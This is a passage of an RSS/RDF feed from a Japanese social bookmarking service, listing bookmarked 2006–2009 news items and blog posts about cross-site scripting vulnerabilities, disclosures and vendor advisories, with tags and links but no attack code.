   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fphpbb.xwd.jp%2Fviewtopic.php%3Ft%3D1144&amp;title=WordPress%20Japan%20%3A%3A%20%E3%83%88%E3%83%94%E3%83%83%E3%82%AF%E3%82%92%E8%A1%A8%E7%A4%BA%20-%20%E5%A4%9A%E3%81%8F%E3%81%AE%E3%83%86%E3%83%BC%E3%83%9E%E3%81%AB%20XSS%20%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AE%E3%81%8A%E3%81%9D%E3%82%8C%20%28EasyAll%20%E3%81%AF%E8%A6%81%E7%A2%BA%E8%AA%8D%29"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fblog.i-know.jp%2Farchives%2F2007%2F04%2F09%2Fxss%2F&amp;title=I%20know.%20%E9%96%8B%E7%99%BA%E6%97%A5%E8%AA%8C%E3%80%81%20%C2%BB%20XSS%20%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E3%81%8A%E7%9F%A5%E3%82%89%E3%81%9B%E3%80%82"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.sixapart.jp%2Fmovabletype%2Fnews%2F2006%2F09%2F26-1115.html&amp;title=Six%20Apart%20-%20Movable%20Type%20News%3A%20%E3%80%90%E9%87%8D%E8%A6%81%E3%80%91%20Movable%20Type%20%E6%96%B0%E3%83%90%E3%83%BC%E3%82%B8%E3%83%A7%E3%83%B3%E3%81%A8%E3%83%91%E3%83%83%E3%83%81%E3%81%AE%E6%8F%90%E4%BE%9B%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.atmarkit.co.jp%2Ffsecurity%2Fspecial%2F30xss%2Fxss01.html&amp;title=%EF%BC%A0IT%EF%BC%9A%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E5%AF%BE%E7%AD%96%E3%81%AE%E5%9F%BA%E6%9C%AC"/>
   <rdf:li resource="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2Fhoshikuzu%2F20060710%23ONWINIEIE&amp;title=hoshikuzu%20%7C%20star_dust%20%E3%81%AE%E6%9B%B8%E6%96%8E%20-%20cookie%E3%82%92%E3%81%8A%E9%A0%90%E3%81%8B%E3%82%8A%E3%81%97%E3%81%BE%E3%81%99%3A%20%E6%82%AA%E6%84%8F%E3%81%82%E3%82%8B%E5%85%B1%E5%90%8C%E9%A0%90%E3%81%8B%E3%82%8A%E6%89%80"/>
  </rdf:Seq>
 </items>
 <dc:date>2010-01-07T14:19:52Z</dc:date>
</channel>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FNEWS%2F20061113%2F253479%2F&amp;title=%E3%80%8CXSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AF%E5%8D%B1%E9%99%BA%EF%BC%8CCookie%E3%82%92%E7%9B%97%E3%81%BE%E3%82%8C%E3%82%8B%E3%81%A0%E3%81%91%E3%81%A7%E3%81%AF%E6%B8%88%E3%81%BE%E3%81%AA%E3%81%84%E3%80%8D%E5%B0%82%E9%96%80%E5%AE%B6%E3%81%8C%E6%B3%A8%E6%84%8F%E5%96%9A%E8%B5%B7%EF%BC%9AITpro">
 <title>「XSS脆弱性は危険，Cookieを盗まれるだけでは済まない」専門家が注意喚起：ITpro</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FNEWS%2F20061113%2F253479%2F&amp;title=%E3%80%8CXSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AF%E5%8D%B1%E9%99%BA%EF%BC%8CCookie%E3%82%92%E7%9B%97%E3%81%BE%E3%82%8C%E3%82%8B%E3%81%A0%E3%81%91%E3%81%A7%E3%81%AF%E6%B8%88%E3%81%BE%E3%81%AA%E3%81%84%E3%80%8D%E5%B0%82%E9%96%80%E5%AE%B6%E3%81%8C%E6%B3%A8%E6%84%8F%E5%96%9A%E8%B5%B7%EF%BC%9AITpro</link>
 
  
   <description>
     <![CDATA[
       　「クロスサイト・スクリプティング（XSS）脆弱性を悪用された場合の被害例としては『Cookieを盗まれる』ことがよく挙げられる。しかし，実際にはもっと深刻な被害を受ける恐れがある。管理者や開発者はその危険性を十分に認識して，対策を施す必要がある」——。京セラコミュニケーションシステムのセキュリティ...
       <a href="http://itpro.nikkeibp.co.jp/article/NEWS/20061113/253479/">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FNEWS%2F20061113%2F253479%2F&amp;title=%E3%80%8CXSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AF%E5%8D%B1%E9%99%BA%EF%BC%8CCookie%E3%82%92%E7%9B%97%E3%81%BE%E3%82%8C%E3%82%8B%E3%81%A0%E3%81%91%E3%81%A7%E3%81%AF%E6%B8%88%E3%81%BE%E3%81%AA%E3%81%84%E3%80%8D%E5%B0%82%E9%96%80%E5%AE%B6%E3%81%8C%E6%B3%A8%E6%84%8F%E5%96%9A%E8%B5%B7%EF%BC%9AITpro">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://itpro.nikkeibp.co.jp/article/NEWS/20061113/253479/</dc:source>
 <dc:identifier>35199</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2006-11-13T08:03:53Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>phishing</dc:subject>
 <dc:subject>crosssitescripting</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/phishing"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/crosssitescripting"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Falpha-geek%2F0017&amp;title=%236%E3%80%80IT%E6%88%A6%E5%A3%AB%20%E5%A4%A9%E9%87%8E%20%E4%BB%81%E5%8F%B2%EF%BC%8F%E3%81%93%E3%82%93%E3%81%AB%E3%81%A1%E3%81%AF%E3%81%93%E3%82%93%E3%81%AB%E3%81%A1%E3%81%AF%EF%BC%81%20Hamachiya2%EF%BC%88%E4%B8%AD%E7%B7%A8%EF%BC%89%E3%80%80%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%E3%81%AF%E3%81%84%E3%81%8B%E3%81%AB%E3%81%97%E3%81%A6XSS%2FCSRF%E3%82%92%E8%A6%8B%E3%81%A4%E3%81%91%E3%82%8B%E3%81%8B%EF%BD%9Cgihyo.jp">
 <title>#6　IT戦士 天野 仁史／こんにちはこんにちは！ Hamachiya2（中編）　はまちちゃんはいかにしてXSS/CSRFを見つけるか｜gihyo.jp</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Falpha-geek%2F0017&amp;title=%236%E3%80%80IT%E6%88%A6%E5%A3%AB%20%E5%A4%A9%E9%87%8E%20%E4%BB%81%E5%8F%B2%EF%BC%8F%E3%81%93%E3%82%93%E3%81%AB%E3%81%A1%E3%81%AF%E3%81%93%E3%82%93%E3%81%AB%E3%81%A1%E3%81%AF%EF%BC%81%20Hamachiya2%EF%BC%88%E4%B8%AD%E7%B7%A8%EF%BC%89%E3%80%80%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%E3%81%AF%E3%81%84%E3%81%8B%E3%81%AB%E3%81%97%E3%81%A6XSS%2FCSRF%E3%82%92%E8%A6%8B%E3%81%A4%E3%81%91%E3%82%8B%E3%81%8B%EF%BD%9Cgihyo.jp</link>
 
  
   <description>
     <![CDATA[
        gihyo.jp &raquo; DEVELOPER STAGE &raquo; 連載 &raquo; 小飼弾のアルファギークに逢いたい&hearts; &raquo; #6　IT戦士 天野 仁史／こんにちはこんにちは！ Hamachiya2（中編）　はまちちゃんはいかにしてXSS/CSRFを見つけるか小飼弾のアルファギークに逢いたい&hearts;#6　IT戦士 天野 仁史／こんにちはこんにちは！ Hamachiya2（中編）　はまちちゃんはいかにしてXSS/CSRFを見つけるか2007年5月22日初出：WEB+DB PRESS Vol.38（2007年4月24日発売） 小飼弾 JavaScript天野 仁史さん，Hamachiya2さん（はまちちゃん）との対談の中編です。編集部注）本対談は2007年3月に行われたものです。こんにちはこんにちは！弾：はまちちゃんはいつ頃から「こんにちは」に興味が出てきたの？は：確かmixiを始めた2年前くらいかな。mixiってブログと違って，日記にコメントがたくさんつくのがおもしろくてハマってて。毎日見てるうちにおもしろい現象を見かけたんです。たまたま誰かが「ラーメン」っ...
       <a href="http://gihyo.jp/dev/serial/01/alpha-geek/0017">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fgihyo.jp%2Fdev%2Fserial%2F01%2Falpha-geek%2F0017&amp;title=%236%E3%80%80IT%E6%88%A6%E5%A3%AB%20%E5%A4%A9%E9%87%8E%20%E4%BB%81%E5%8F%B2%EF%BC%8F%E3%81%93%E3%82%93%E3%81%AB%E3%81%A1%E3%81%AF%E3%81%93%E3%82%93%E3%81%AB%E3%81%A1%E3%81%AF%EF%BC%81%20Hamachiya2%EF%BC%88%E4%B8%AD%E7%B7%A8%EF%BC%89%E3%80%80%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%E3%81%AF%E3%81%84%E3%81%8B%E3%81%AB%E3%81%97%E3%81%A6XSS%2FCSRF%E3%82%92%E8%A6%8B%E3%81%A4%E3%81%91%E3%82%8B%E3%81%8B%EF%BD%9Cgihyo.jp">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://gihyo.jp/dev/serial/01/alpha-geek/0017</dc:source>
 <dc:identifier>83486</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-05-22T09:59:37Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>csrf</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>life</dc:subject>
 <dc:subject>entertainment</dc:subject>
 <dc:subject>hamachi</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/csrf"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/life"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/entertainment"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/hamachi"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070129%2Fipa&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20%E3%81%AF%E3%81%98%E3%82%81%E3%81%A6%E3%81%AE%E3%81%BB%E3%81%86%E3%81%93%E3%81%8F">
 <title>ぼくはまちちゃん！(Hatena) - はじめてのほうこく</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070129%2Fipa&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20%E3%81%AF%E3%81%98%E3%82%81%E3%81%A6%E3%81%AE%E3%81%BB%E3%81%86%E3%81%93%E3%81%8F</link>
 
  
   <description>
     <![CDATA[
           <br /> ようこそゲストさん 最新の日記記事一覧ユーザー登録ログインヘルプぼくはまちちゃん！(Hatena) ライブドアリーダーで購読 → &lt;話題の掲示板  | IPAたんからの返事 &gt;2007/01/29■はじめてのほうこく <br />こうですか！<br />https://isec.ipa.go.jp/inq/servlet/InqMainServlet?id=index&gamenFlg=6<br /><br />PGPってなに！ なんですかこれ！<br />このまま送信しちゃったけど、うまく報告できたかわかりません＞＜<br />(追記)<br />id:send たんが、ch.search.yahoo.com で同じことできてたから<br />本家search.yahoo.com とかもあわせて再通報しといたよ！<br />けど、海外のサイトも IPA でよかったのかな…！(おまけ)<br />この際だからついでに、はてなもご愛用の geotrust(SSL証明書屋さん) の脆弱性も通報しときました！Permalink | コメント(3) | トラックバック(12)   コメント一覧SiroKuro2007/01/29 23:04PGP公開鍵は、PGP ってソフトで暗号化するときのパスワードみたいなもの...
       <a href="http://d.hatena.ne.jp/Hamachiya2/20070129/ipa">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20070129%2Fipa&amp;title=%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29%20-%20%E3%81%AF%E3%81%98%E3%82%81%E3%81%A6%E3%81%AE%E3%81%BB%E3%81%86%E3%81%93%E3%81%8F">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://d.hatena.ne.jp/Hamachiya2/20070129/ipa</dc:source>
 <dc:identifier>52386</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-01-29T15:10:42Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>yahoo</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>hamachi</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/yahoo"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/hamachi"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fd2.mixi.jp%2Fview_idea.pl%3Fid%3D1983&amp;title=%E3%82%BD%E3%83%BC%E3%82%B7%E3%83%A3%E3%83%AB%E3%83%BB%E3%83%8D%E3%83%83%E3%83%88%E3%83%AF%E3%83%BC%E3%82%AD%E3%83%B3%E3%82%B0%E3%82%B5%E3%82%A4%E3%83%88%20%5Bmixi%28%E3%83%9F%E3%82%AF%E3%82%B7%E3%82%A3%29%5D%20-%20%E3%83%88%E3%83%94%E3%83%83%E3%82%AF%E6%A4%9C%E7%B4%A2%E3%81%AEXSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%82%92%E4%BF%AE%E6%AD%A3%E3%81%97%E3%81%A6%E3%81%BB%E3%81%97%E3%81%84">
 <title>ソーシャル・ネットワーキングサイト [mixi(ミクシィ)] - トピック検索のXSS脆弱性を修正してほしい</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fd2.mixi.jp%2Fview_idea.pl%3Fid%3D1983&amp;title=%E3%82%BD%E3%83%BC%E3%82%B7%E3%83%A3%E3%83%AB%E3%83%BB%E3%83%8D%E3%83%83%E3%83%88%E3%83%AF%E3%83%BC%E3%82%AD%E3%83%B3%E3%82%B0%E3%82%B5%E3%82%A4%E3%83%88%20%5Bmixi%28%E3%83%9F%E3%82%AF%E3%82%B7%E3%82%A3%29%5D%20-%20%E3%83%88%E3%83%94%E3%83%83%E3%82%AF%E6%A4%9C%E7%B4%A2%E3%81%AEXSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%82%92%E4%BF%AE%E6%AD%A3%E3%81%97%E3%81%A6%E3%81%BB%E3%81%97%E3%81%84</link>
 
  
   <description>
     <![CDATA[
       グローバルナビ<br /><br /><br />次回から自動的にログイン※パスワードを忘れた方はこちらSSL(https)はこちらホームミクシィについて新規登録についてヘルプ運営会社利用規約プライバシーポリシーご利用上の注意広告掲載スタッフ募集（Find Job !）Copyright (C) 1999-2008 mixi, Inc. All rights reserved.
       <a href="http://d2.mixi.jp/view_idea.pl?id=1983">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fd2.mixi.jp%2Fview_idea.pl%3Fid%3D1983&amp;title=%E3%82%BD%E3%83%BC%E3%82%B7%E3%83%A3%E3%83%AB%E3%83%BB%E3%83%8D%E3%83%83%E3%83%88%E3%83%AF%E3%83%BC%E3%82%AD%E3%83%B3%E3%82%B0%E3%82%B5%E3%82%A4%E3%83%88%20%5Bmixi%28%E3%83%9F%E3%82%AF%E3%82%B7%E3%82%A3%29%5D%20-%20%E3%83%88%E3%83%94%E3%83%83%E3%82%AF%E6%A4%9C%E7%B4%A2%E3%81%AEXSS%E8%84%86%E5%BC%B1%E6%80%A7%E3%82%92%E4%BF%AE%E6%AD%A3%E3%81%97%E3%81%A6%E3%81%BB%E3%81%97%E3%81%84">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://d2.mixi.jp/view_idea.pl?id=1983</dc:source>
 <dc:identifier>14505</dc:identifier>
 <dc:creator>bookey</dc:creator>
 <dc:date>2006-07-26T15:45:31Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>mixi</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>脆弱性</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/mixi"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E8%84%86%E5%BC%B1%E6%80%A7"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Finternet.watch.impress.co.jp%2Fdocs%2Fnews%2F20090820_309601.html&amp;title=%E5%85%A8%E6%96%87%E6%A4%9C%E7%B4%A2%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%80%8CNamazu%E3%80%8D%E3%80%81%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AA%E9%81%A9%E7%94%A8%E3%82%B5%E3%82%A4%E3%83%88%E3%81%ABIPA%E6%B3%A8%E6%84%8F%E5%96%9A%E8%B5%B7%20-INTERNET%20Watch">
 <title>全文検索システム「Namazu」、最新版未適用サイトにIPA注意喚起 -INTERNET Watch</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Finternet.watch.impress.co.jp%2Fdocs%2Fnews%2F20090820_309601.html&amp;title=%E5%85%A8%E6%96%87%E6%A4%9C%E7%B4%A2%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%80%8CNamazu%E3%80%8D%E3%80%81%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AA%E9%81%A9%E7%94%A8%E3%82%B5%E3%82%A4%E3%83%88%E3%81%ABIPA%E6%B3%A8%E6%84%8F%E5%96%9A%E8%B5%B7%20-INTERNET%20Watch</link>
 
  
   <description>
     <![CDATA[
       情報処理推進機構（IPA）は20日、オープンソースの日本語全文検索システム「Namazu」の脆弱性について、「既に脆弱性対策を施したバージョンが公表されているにも関わらず、未適用のWebサイトがある」といった届出が増えているとして、Nama...
       <a href="http://internet.watch.impress.co.jp/docs/news/20090820_309601.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Finternet.watch.impress.co.jp%2Fdocs%2Fnews%2F20090820_309601.html&amp;title=%E5%85%A8%E6%96%87%E6%A4%9C%E7%B4%A2%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%80%8CNamazu%E3%80%8D%E3%80%81%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AA%E9%81%A9%E7%94%A8%E3%82%B5%E3%82%A4%E3%83%88%E3%81%ABIPA%E6%B3%A8%E6%84%8F%E5%96%9A%E8%B5%B7%20-INTERNET%20Watch">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://internet.watch.impress.co.jp/docs/news/20090820_309601.html</dc:source>
 <dc:identifier>1522062</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-08-20T10:08:44Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>脆弱性</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>namazu</dc:subject>
 <dc:subject>未適用</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E8%84%86%E5%BC%B1%E6%80%A7"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/namazu"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E6%9C%AA%E9%81%A9%E7%94%A8"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20363167%2C00.htm&amp;title=%E6%8E%B2%E7%A4%BA%E6%9D%BF%E3%82%BD%E3%83%95%E3%83%88%E3%80%8CRainboard%E3%80%8D%E3%81%ABXSS%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7--JVN%E3%81%AA%E3%81%A9%E3%81%A7%E8%AD%A6%E5%91%8A%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
 <title>掲示板ソフト「Rainboard」にXSSの脆弱性--JVNなどで警告:ニュース - CNET Japan</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20363167%2C00.htm&amp;title=%E6%8E%B2%E7%A4%BA%E6%9D%BF%E3%82%BD%E3%83%95%E3%83%88%E3%80%8CRainboard%E3%80%8D%E3%81%ABXSS%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7--JVN%E3%81%AA%E3%81%A9%E3%81%A7%E8%AD%A6%E5%91%8A%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan</link>
 
  
   <description>
     <![CDATA[
       掲示板ソフト「Rainboard」にXSSの脆弱性--JVNなどで警告:ニュース - CNET Japan       CNET_IDメールマガジンフィードポッドキャストツールサイトマップトップニュース特集オピニオンブログホワイトペーパーリサーチワークスタイルベンチャーレビューモバイルマーケティング...
       <a href="http://japan.cnet.com/news/sec/story/0,2000056024,20363167,00.htm">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20363167%2C00.htm&amp;title=%E6%8E%B2%E7%A4%BA%E6%9D%BF%E3%82%BD%E3%83%95%E3%83%88%E3%80%8CRainboard%E3%80%8D%E3%81%ABXSS%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7--JVN%E3%81%AA%E3%81%A9%E3%81%A7%E8%AD%A6%E5%91%8A%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://japan.cnet.com/news/sec/story/0,2000056024,20363167,00.htm</dc:source>
 <dc:identifier>211514</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-12-12T13:05:03Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>summarysite</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/summarysite"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2Fhasegawayosuke%2F20070404%2Fp1&amp;title=%E8%91%89%E3%81%A3%E3%81%B1%E6%97%A5%E8%A8%98%20-%20%E3%80%8C%E6%8B%A1%E5%BC%B5%E5%AD%90%E3%81%A7%E3%81%AF%E3%81%AA%E3%81%8F%E3%80%81%E5%86%85%E5%AE%B9%E3%81%AB%E3%82%88%E3%81%A3%E3%81%A6%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB%E3%82%92%E9%96%8B%E3%81%8F%E3%81%93%E3%81%A8%E3%80%8D%E3%81%AE%E6%8B%A1%E5%BC%B5%E5%AD%90%E3%81%AF%20Content-Type%20%E3%81%A7%E3%81%AF%E3%81%AA%E3%81%84%E3%81%93%E3%81%A8%E3%81%AB%E6%B3%A8%E6%84%8F">
 <title>葉っぱ日記 - 「拡張子ではなく、内容によってファイルを開くこと」の拡張子は Content-Type ではないことに注意</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2Fhasegawayosuke%2F20070404%2Fp1&amp;title=%E8%91%89%E3%81%A3%E3%81%B1%E6%97%A5%E8%A8%98%20-%20%E3%80%8C%E6%8B%A1%E5%BC%B5%E5%AD%90%E3%81%A7%E3%81%AF%E3%81%AA%E3%81%8F%E3%80%81%E5%86%85%E5%AE%B9%E3%81%AB%E3%82%88%E3%81%A3%E3%81%A6%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB%E3%82%92%E9%96%8B%E3%81%8F%E3%81%93%E3%81%A8%E3%80%8D%E3%81%AE%E6%8B%A1%E5%BC%B5%E5%AD%90%E3%81%AF%20Content-Type%20%E3%81%A7%E3%81%AF%E3%81%AA%E3%81%84%E3%81%93%E3%81%A8%E3%81%AB%E6%B3%A8%E6%84%8F</link>
 
  
   <description>
     <![CDATA[
                       最新の日記    記事一覧    ユーザー登録    ログイン    ヘルプ  葉っぱ日記                                                                                                                       &lt;&lt;            random            &gt;&gt;                    &lt;&lt;            random            &gt;&gt;                    &lt;&lt;            random            &gt;&gt;                    &lt;&lt;            random            &gt;&gt;    [ はせがわの連絡先 ]  [ 定番情報源 ] &nbsp[ アンテナ ]&nbsp[ ブックマーク ] &nbsp[ カレンダー ]  [ はてなRSSに追加 ]  ...
       <a href="http://d.hatena.ne.jp/hasegawayosuke/20070404/p1">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fd.hatena.ne.jp%2Fhasegawayosuke%2F20070404%2Fp1&amp;title=%E8%91%89%E3%81%A3%E3%81%B1%E6%97%A5%E8%A8%98%20-%20%E3%80%8C%E6%8B%A1%E5%BC%B5%E5%AD%90%E3%81%A7%E3%81%AF%E3%81%AA%E3%81%8F%E3%80%81%E5%86%85%E5%AE%B9%E3%81%AB%E3%82%88%E3%81%A3%E3%81%A6%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB%E3%82%92%E9%96%8B%E3%81%8F%E3%81%93%E3%81%A8%E3%80%8D%E3%81%AE%E6%8B%A1%E5%BC%B5%E5%AD%90%E3%81%AF%20Content-Type%20%E3%81%A7%E3%81%AF%E3%81%AA%E3%81%84%E3%81%93%E3%81%A8%E3%81%AB%E6%B3%A8%E6%84%8F">
